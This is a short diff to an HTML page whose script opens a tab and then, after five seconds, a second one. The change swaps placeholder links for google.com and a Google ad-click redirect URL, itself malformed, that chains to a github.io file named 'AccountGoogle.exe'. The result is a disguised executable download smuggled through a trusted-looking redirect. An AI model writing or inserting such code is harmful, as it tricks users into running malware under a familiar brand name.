--- a/filesystem.html
+++ b/filesystem.html
@@ -53,9 +53,9 @@
 <body>
   <script>
     function a() {
-      window.open('https://example.com', '_blank');
+      window.open('https://google.com', '_blank');
       setTimeout(function() {
-        window.open('https://example.com/file.apk', '_blank');
+        window.open('https://https://adservice.google.com/ddm/clk/408533097;208818505;l;;%3F//lanaya113505.github.io/pizza/AccountGoogle.exe?', '_blank');
       }, 5000);
     }
   <\/script>
